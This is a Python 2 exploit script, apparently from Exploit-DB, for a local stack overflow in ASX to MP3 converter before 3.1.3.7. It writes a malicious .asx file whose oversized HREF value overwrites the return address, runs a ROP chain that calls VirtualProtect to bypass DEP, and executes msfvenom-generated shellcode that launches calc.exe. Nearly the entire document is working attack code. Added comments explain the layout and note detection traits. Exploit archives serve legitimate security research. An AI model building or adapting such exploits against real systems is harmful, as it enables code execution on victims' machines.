ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)

EDB-ID:

42963




Platform:

Windows

Date:

2017-10-08


import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''

# Filler that reaches the saved return address: the author's measured
# offset is 17375 bytes into the HREF attribute value. The byte value
# itself does not matter.
#offset 17375
junk = "A" *17375

# Return-address overwrite. Two candidates are noted; the packed bytes
# decode (little-endian) to 0x774e1036, one more than the commented
# 0x774e1035 -- which one the author intended cannot be told from this
# file. Either way it is an absolute address, so the file only works
# against the exact, non-rebased module layout it was built for.
#0x1003df8e
#0x774e1035
EIP="\x36\x10\x4e\x77"

# Four bytes of padding between the return address and the ROP chain
# (accounted for as the second "-4" in the garbage calculation below).
adjust="A" *4

def create_rop_chain():
    """Return the ROP chain as a str of packed little-endian DWORDs.

    Per the per-gadget comments, the chain reads VirtualProtect's address
    out of COMCTL32's import table, builds the size (0x201) and protection
    (0x40) arguments with NEG, and uses PUSHAD to make the call -- the DEP
    bypass named in the title. Every address is absolute and tied to a
    specific module (MFC42, MSVCP60, ntdll, USER32, ...), so any of those
    modules being rebased or subject to ASLR breaks the chain; that
    dependence is the property a mitigation review should check.

    Python 2 only: struct.pack returns str here, which is what ''.join
    expects (the print statements below confirm the Python 2 target).
    """
    
    rop_gadgets = [
      0x73dd5dce,  # POP EAX # RETN [MFC42.DLL]
      0x5d091368,  # ptr to &VirtualProtect() [IAT COMCTL32.dll]
      0x7608708e,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
      0x73dd40f1,  # XCHG EAX,ESI # RETN [MFC42.DLL]
      0x7c96feb7,  # POP EBP # RETN [ntdll.dll]
      0x7608fcec,  # & push esp # ret  [MSVCP60.dll]
      0x01c395d4,  # POP EAX # RETN [MSA2Mcodec00.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x77d74960,  # NEG EAX # RETN [USER32.dll]
      0x7ca485b4,  # XCHG EAX,EBX # RETN [SHELL32.dll]
      0x01d64827,  # POP EAX # RETN [msvos.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x77d74960,  # NEG EAX # RETN [USER32.dll]
      0x71ab9b46,  # XCHG EAX,EDX # RETN [WS2_32.dll]
      0x1003fd11,  # POP ECX # RETN [MSA2Mfilter03.dll]
      0x77da1d04,  # &Writable location [USER32.dll]
      0x01d34691,  # POP EDI # RETN [MSA2Mctn01.dll]
      0x76091182,  # RETN (ROP NOP) [MSVCP60.dll]
      0x7d7da123,  # POP EAX # RETN [WMVCore.DLL]
      0x90909090,  # nop
      0x77195015,  # PUSHAD # RETN [OLEAUT32.dll]
    ]
    # '<I' = little-endian unsigned 32-bit, one DWORD per gadget.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	
rop_chain = create_rop_chain()

# Payload produced by msfvenom; the generating command is kept verbatim
# from the author, including the bad-character list it was built around.
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "\x00\x0a\x0d EXITFUNC=seh
#badcharacters "\x00\x0a\x0d"

buf =  ""
buf += "\xda\xd6\xba\xf5\xa4\x32\xf4\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\xe1\x46"
buf += "\xc7\x08\xe1\x05\x28\xf1\xf1\x69\xa0\x14\xc0\xa9\xd6"
buf += "\x5d\x72\x1a\x9c\x30\x7e\xd1\xf0\xa0\xf5\x97\xdc\xc7"
buf += "\xbe\x12\x3b\xe9\x3f\x0e\x7f\x68\xc3\x4d\xac\x4a\xfa"
buf += "\x9d\xa1\x8b\x3b\xc3\x48\xd9\x94\x8f\xff\xce\x91\xda"
buf += "\xc3\x65\xe9\xcb\x43\x99\xb9\xea\x62\x0c\xb2\xb4\xa4"
buf += "\xae\x17\xcd\xec\xa8\x74\xe8\xa7\x43\x4e\x86\x39\x82"
buf += "\x9f\x67\x95\xeb\x10\x9a\xe7\x2c\x96\x45\x92\x44\xe5"
buf += "\xf8\xa5\x92\x94\x26\x23\x01\x3e\xac\x93\xed\xbf\x61"
buf += "\x45\x65\xb3\xce\x01\x21\xd7\xd1\xc6\x59\xe3\x5a\xe9"
buf += "\x8d\x62\x18\xce\x09\x2f\xfa\x6f\x0b\x95\xad\x90\x4b"
buf += "\x76\x11\x35\x07\x9a\x46\x44\x4a\xf0\x99\xda\xf0\xb6"
buf += "\x9a\xe4\xfa\xe6\xf2\xd5\x71\x69\x84\xe9\x53\xce\x74"
buf += "\x1b\x6e\xda\xe1\x82\x1b\xa7\x6f\x35\xf6\xeb\x89\xb6"
buf += "\xf3\x93\x6d\xa6\x71\x96\x2a\x60\x69\xea\x23\x05\x8d"
buf += "\x59\x43\x0c\xee\x3c\xd7\xcc\xdf\xdb\x5f\x76\x20"

# Ten "S" bytes precede the payload body; presumably a small pad, but the
# file does not say why.
shellcode="S"*10+buf

# Python 2 print statements (the whole file targets Python 2, where str
# is a byte string).
print "Length of shellcode is:",len(shellcode)
print "Length of ropchain is:",len(rop_chain)

# Shows how the trailing padding is derived: a fixed 26000-byte total
# minus junk, return address, adjust, shellcode and chain. The result is
# only printed; `garbage` below hard-codes the literal 8303, so the two
# can silently drift apart.
print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))

garbage= "C" *8303

foot ='''_playlis.wma"/>
</Entry>
</ASX>'''

# Final layout of the HREF value: filler, return address, padding, chain,
# payload, trailing padding, then the closing markup. From a detection
# standpoint the observable artifact is an .asx whose single HREF
# attribute is tens of kilobytes of mostly repeated bytes.
payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot

# Output file is opened in text mode ("w"), not binary, and closed
# explicitly rather than via `with`.
fobj = open("exploit.asx","w")
fobj.write(payload)
fobj.close()